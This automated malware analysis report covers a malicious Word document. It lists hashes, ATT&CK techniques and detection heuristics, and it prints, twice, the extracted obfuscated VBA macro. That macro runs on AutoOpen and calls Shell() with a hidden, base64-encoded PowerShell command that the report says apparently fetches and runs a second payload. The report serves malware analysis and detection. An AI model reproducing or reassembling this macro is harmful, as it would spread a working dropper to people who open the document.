Office (OLE) malware analysis — malicious · ce0bfdb9465973bb

MALICIOUS

Office (OLE)

107.5 KB Created: 2018-05-31 09:26:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: 9c963ddef7b5b6749d1c19f53f8197a2 SHA-1: b69b65d0431744b213989e735528ba0042b7ac97 SHA-256: ce0bfdb9465973bb44da67cd89913325645943dccdb6cf6903019b76bd6eb0ba

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an Autoopen subroutine. This macro calls the Shell() function, which is a critical indicator of malicious activity. The script attempts to construct a PowerShell command, suggesting it's designed to download and execute a secondary payload. The obfuscated nature of the script and the lack of a clear URL prevent higher confidence in family attribution.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18331 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18331 bytes
SHA-256: `c46bdd87e0a1f9f2fe814d728acb5a07e60e4dbe178afe807e1fa0f384936dfa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vJviKlDZFUtz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function lwOFdS() On Error Resume Next Select Case KAlJpaMw Case 98328 MZlNaG = 99216 nBiYn = CDbl(88851) Case 50042 fdEHMc = QWTHA pMawb = 82019 End Select Select Case KAlIBXso Case 91624 tLBOaj = 9702 jsrRjI = CDbl(41369) Case 82641 zwzwp = bLDHc FMTRvX = 8225 End Select lwOFdS = fhDVRKK + Shell(bOsdZNE + Chr(vbKeyP) + QCoGdOzzaY + zGiZEDwMvkJ + VjkPltwaKFs + RNjSLiGH + FGIwi + vUcnjKZ + pDwOpPv + wHiKzIiFI + kXjjpV, SVWzPjmXlB + vbHide + YlGDzARDci) Select Case KAlEhRUt Case 55320 FJGKmK = 31839 pwiDEZ = CDbl(6416) Case 43630 cRdfXA = kRWCSh EMZWBw = 93817 End Select End Function Sub Autoopen() On Error Resume Next Select Case KAlToUiTN Case 37534 uBKor = 55191 ChJSZV = CDbl(77364) Case 26781 HUdri = Baflw LthaRQ = 53526 End Select lwOFdS Select Case KAlItlbN Case 44091 sdXUia = 88753 wkcVr = CDbl(99239) Case 69835 FiJro = sIEMMR jBdHO = 17437 End Select End Sub Attribute VB_Name = "IQTNRWjqpvkBXk" Function QCoGdOzzaY() On Error Resume Next Select Case KAlJnjacX Case 29697 SKwdFE = 34903 IjKpLl = CDbl(45103) Case 71654 sUsRjM = JVoCjL hczcNp = 25895 End Select qRcIjV = "owersHeLL " + "-WinDowsTyle h" + "idden -e LgA" + "oACAAJABlAG4Adg" Select Case KAlvGbCR Case 51939 kXPvt = 68048 XdizW = CDbl(40150) Case 68886 PNzrd = LJKvT ZlpjvB = 8484 End Select ZzuNazcTJ = "A6AEMAbw" + "BtAHMAcABl" + "AEMAWwA0ACwAM" + "gA0ACwAMgA1AF" + "0ALQBqAE8AS" + "QBuAC" Select Case KAlRmlRIi Case 11216 tPTsQ = 60635 NFZzrY = CDbl(26793) Case 11270 ZrdlnC = UQwwc fiwHpQ = 89736 End Select VIohrw = "cAJwApACAAK" + "AAoACcAbgA" + "1AFYA" + "bgBzAGE" + "AJwArACcAZABh" + "AHMAZA" + "AgACcAKwAnAD0" Select Case KAlbbtuca Case 42586 MMDjm = 84747 AUiqN = CDbl(96849) Case 54078 hOlZq = kjzLWw jrLbf = 33491 End Select dkWZzlDYA = "AIAAm" + "ACcAKwAn" + "ACgAbgA0" + "AGgAbg" + "AnACsAJwBuADQ" + "AaAAnACsAJwArAC" + "cAKwAnAG4A" + "JwArACcANABoAGU" Select Case KAlmvwpn Case 33474 mHZhiw = 17968 fqBfD = CDbl(53512) Case 55595 VPtBR = WPhjYf SwmZCz = 53704 End Select SPHjAXwwFl = "AbgA0AGgAKwAn" + "ACsAJwBuADQAaAB" + "3AC0Abw" + "BiACcAKwA" + "nAGoAJwArACc" + "AZQBjACcAKw" + "AnAG4ANABo" Select Case KAlirzGX Case 22772 aANcJ = 79192 ZuPjKk = CDbl(19723) Case 99115 adaNuO = BdAir tvuQB = 78568 End Select VInbpXlcCwO = "ACsAJwArAC" + "cAbgA0AGgAdA" + "BuADQAJ" + "wArACcAaAApACAA" + "cgAnACsA" + "JwBhACcAKwAnAG4" + "AZABvAG0AOwBuAD" Select Case KAlTwWwrW Case 84696 VnrNi = 89315 cwwbL = CDbl(90386) Case 23324 IHjBAU = tjVSii dWXWv = 60691 End Select NZuIBTVC = "UAVgBZAFkAV" + "QAnAC" + "sAJwAgAD0AIA" + "AuACgAbgA0AGg" + "AbgAnACsAJw" + "BlAG4ANABoA" + "CcAKwAnACsA" Select Case KAlJUNdUS Case 95764 ZdlHw = 25986 IVrpju = CDbl(14972) Case 84843 QuVSc = pzjHw WXjBoa = 18196 End Select qafwcrLZcid = "bgA0ACcAKwA" + "nAGgAJwArACcAd" + "wAnACs" + "AJwBuADQ" + "AJwArACc" + "AaAArAG4ANA" + "AnACs" + "AJwBoAC0Abw" + "BiAGoAJwArA" + "CcAZQBjAHQAJw" Select Case KAljXjuoN Case 3975 GvvBcB = 25701 zfqVo = CDbl(74730) Case 51150 ODmzLn = TwzftO iOBJsk = 23062 End Select BkNQTs = "ArACcAbgA0AGgAK" + "Q ... (truncated)

SHA-256: c46bdd87e0a1f9f2fe814d728acb5a07e60e4dbe178afe807e1fa0f384936dfa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vJviKlDZFUtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lwOFdS()
On Error Resume Next
Select Case KAlJpaMw
      Case 98328
         MZlNaG = 99216
         nBiYn = CDbl(88851)
      Case 50042
         fdEHMc = QWTHA
         pMawb = 82019
End Select
Select Case KAlIBXso
      Case 91624
         tLBOaj = 9702
         jsrRjI = CDbl(41369)
      Case 82641
         zwzwp = bLDHc
         FMTRvX = 8225
End Select
lwOFdS = fhDVRKK + Shell(bOsdZNE + Chr(vbKeyP) + QCoGdOzzaY + zGiZEDwMvkJ + VjkPltwaKFs + RNjSLiGH + FGIwi + vUcnjKZ + pDwOpPv + wHiKzIiFI + kXjjpV, SVWzPjmXlB + vbHide + YlGDzARDci)
Select Case KAlEhRUt
      Case 55320
         FJGKmK = 31839
         pwiDEZ = CDbl(6416)
      Case 43630
         cRdfXA = kRWCSh
         EMZWBw = 93817
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlToUiTN
      Case 37534
         uBKor = 55191
         ChJSZV = CDbl(77364)
      Case 26781
         HUdri = Baflw
         LthaRQ = 53526
End Select
lwOFdS
Select Case KAlItlbN
      Case 44091
         sdXUia = 88753
         wkcVr = CDbl(99239)
      Case 69835
         FiJro = sIEMMR
         jBdHO = 17437
End Select
End Sub


Attribute VB_Name = "IQTNRWjqpvkBXk"
Function QCoGdOzzaY()
On Error Resume Next
Select Case KAlJnjacX
      Case 29697
         SKwdFE = 34903
         IjKpLl = CDbl(45103)
      Case 71654
         sUsRjM = JVoCjL
         hczcNp = 25895
End Select
qRcIjV = "owersHeLL " + "-WinDowsTyle h" + "idden -e LgA" + "oACAAJABlAG4Adg"
Select Case KAlvGbCR
      Case 51939
         kXPvt = 68048
         XdizW = CDbl(40150)
      Case 68886
         PNzrd = LJKvT
         ZlpjvB = 8484
End Select
ZzuNazcTJ = "A6AEMAbw" + "BtAHMAcABl" + "AEMAWwA0ACwAM" + "gA0ACwAMgA1AF" + "0ALQBqAE8AS" + "QBuAC"
Select Case KAlRmlRIi
      Case 11216
         tPTsQ = 60635
         NFZzrY = CDbl(26793)
      Case 11270
         ZrdlnC = UQwwc
         fiwHpQ = 89736
End Select
VIohrw = "cAJwApACAAK" + "AAoACcAbgA" + "1AFYA" + "bgBzAGE" + "AJwArACcAZABh" + "AHMAZA" + "AgACcAKwAnAD0"
Select Case KAlbbtuca
      Case 42586
         MMDjm = 84747
         AUiqN = CDbl(96849)
      Case 54078
         hOlZq = kjzLWw
         jrLbf = 33491
End Select
dkWZzlDYA = "AIAAm" + "ACcAKwAn" + "ACgAbgA0" + "AGgAbg" + "AnACsAJwBuADQ" + "AaAAnACsAJwArAC" + "cAKwAnAG4A" + "JwArACcANABoAGU"
Select Case KAlmvwpn
      Case 33474
         mHZhiw = 17968
         fqBfD = CDbl(53512)
      Case 55595
         VPtBR = WPhjYf
         SwmZCz = 53704
End Select
SPHjAXwwFl = "AbgA0AGgAKwAn" + "ACsAJwBuADQAaAB" + "3AC0Abw" + "BiACcAKwA" + "nAGoAJwArACc" + "AZQBjACcAKw" + "AnAG4ANABo"
Select Case KAlirzGX
      Case 22772
         aANcJ = 79192
         ZuPjKk = CDbl(19723)
      Case 99115
         adaNuO = BdAir
         tvuQB = 78568
End Select
VInbpXlcCwO = "ACsAJwArAC" + "cAbgA0AGgAdA" + "BuADQAJ" + "wArACcAaAApACAA" + "cgAnACsA" + "JwBhACcAKwAnAG4" + "AZABvAG0AOwBuAD"
Select Case KAlTwWwrW
      Case 84696
         VnrNi = 89315
         cwwbL = CDbl(90386)
      Case 23324
         IHjBAU = tjVSii
         dWXWv = 60691
End Select
NZuIBTVC = "UAVgBZAFkAV" + "QAnAC" + "sAJwAgAD0AIA" + "AuACgAbgA0AGg" + "AbgAnACsAJw" + "BlAG4ANABoA" + "CcAKwAnACsA"
Select Case KAlJUNdUS
      Case 95764
         ZdlHw = 25986
         IVrpju = CDbl(14972)
      Case 84843
         QuVSc = pzjHw
         WXjBoa = 18196
End Select
qafwcrLZcid = "bgA0ACcAKwA" + "nAGgAJwArACcAd" + "wAnACs" + "AJwBuADQ" + "AJwArACc" + "AaAArAG4ANA" + "AnACs" + "AJwBoAC0Abw" + "BiAGoAJwArA" + "CcAZQBjAHQAJw"
Select Case KAljXjuoN
      Case 3975
         GvvBcB = 25701
         zfqVo = CDbl(74730)
      Case 51150
         ODmzLn = TwzftO
         iOBJsk = 23062
End Select
BkNQTs = "ArACcAbgA0AGgAK" + "Q
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.